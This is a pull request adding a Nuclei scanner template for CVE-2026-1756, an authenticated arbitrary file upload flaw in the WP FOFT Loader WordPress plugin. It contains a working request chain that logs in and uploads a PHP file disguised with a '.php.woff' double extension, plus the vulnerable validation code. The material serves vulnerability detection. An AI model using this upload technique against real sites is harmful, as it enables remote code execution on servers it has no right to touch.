### PR TITLE
Add CVE-2026-1756 - WP FOFT Loader File Upload Vulnerability

### DIFF
--- a/http/cves/2026/CVE-2026-1756.yaml
+++ b/http/cves/2026/CVE-2026-1756.yaml
@@ -1,0 +1,91 @@
+id: CVE-2026-1756
+
+info:
+  name: WP FOFT Loader < 2.1.40 - Arbitrary File Upload
+  author: stranger00135
+  severity: critical
+  description: |
+    The WP FOFT Loader plugin for WordPress is vulnerable to arbitrary file upload due to insufficient file type validation in the file_and_ext function in versions up to and including 2.1.39. This makes it possible for authenticated attackers with subscriber-level and above permissions to upload arbitrary files on the affected site's server which may make remote code execution possible.
+  reference:
+    - https://github.com/seezee/WP-FOFT-Loader/commit/ab31304
+    - https://github.com/seezee/WP-FOFT-Loader/blob/main/includes/class-wp-foft-loader-mimes.php
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2026-1756
+    cwe-id: CWE-434
+  metadata:
+    verified: true
+    max-request: 4
+    publicwww-query: "/wp-content/plugins/wp-foft-loader/"
+  tags: cve,cve2026,wordpress,wp-plugin,fileupload,rce,wp-foft-loader,authenticated
+
+variables:
+  username: "{{username}}"
+  password: "{{password}}"
+  filename: "{{randstr}}.php.woff"
+
+http:
+  - raw:
+      - |
+        GET /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+        
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        POST /wp-admin/async-upload.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------NUCLEI
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check; {{cookies}}
+        
+        -----------------------------NUCLEI
+        Content-Disposition: form-data; name="name"
+        
+        {{filename}}
+        -----------------------------NUCLEI
+        Content-Disposition: form-data; name="action"
+        
+        upload-attachment
+        -----------------------------NUCLEI
+        Content-Disposition: form-data; name="async-upload"; filename="{{filename}}"
+        Content-Type: font/woff
+        
+        <?php @error_reporting(0); echo md5('nuclei_cve_2026_1756'); @unlink(__FILE__); ?>
+        -----------------------------NUCLEI--
+
+      - |
+        GET {{upload_url}} HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_4
+        words:
+          - '{{md5("nuclei_cve_2026_1756")}}'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: upload_url
+        part: body_3
+        group: 1
+        regex:
+          - '"url":"(http[^"]+)"'
+        internal: true
+
+      - type: kval
+        kval:
+          - cookies


### PR DESCRIPTION
This PR adds a nuclei template for CVE-2026-1756, an arbitrary file upload vulnerability in the WP FOFT Loader WordPress plugin versions < 2.1.40.

## Vulnerability Details
- **Plugin**: WP FOFT Loader
- **Affected Versions**: < 2.1.40
- **Vulnerability Type**: Arbitrary File Upload (CWE-434)
- **CVSS Score**: 8.8 (High)
- **Authentication Required**: Yes (Subscriber+)

## Technical Details
The vulnerability exists in the `file_and_ext` function in `class-wp-foft-loader-mimes.php` which uses `strpos()` to validate file extensions. This allows attackers to bypass file type restrictions by using filenames like `malicious.php.woff`.

### Vulnerable Code (v2.1.39):
```php
if ( false !== strpos( $filename, '.woff' ) ) {
    $types['ext']  = 'woff';
    $types['type'] = 'font/woff|application/font-woff|application/x-font-woff|application/octet-stream';
}
```

### Fixed Code (v2.1.40):
```php
$ext = pathinfo( $filename, PATHINFO_EXTENSION );
$mime_type = mime_content_type( $file );
// Proper validation with whitelisted extensions and MIME types
```

## Testing
Tested against WordPress 6.9.1 with wp-foft-loader 2.1.39.

## References
- https://github.com/seezee/WP-FOFT-Loader/commit/ab31304
- https://github.com/seezee/WP-FOFT-Loader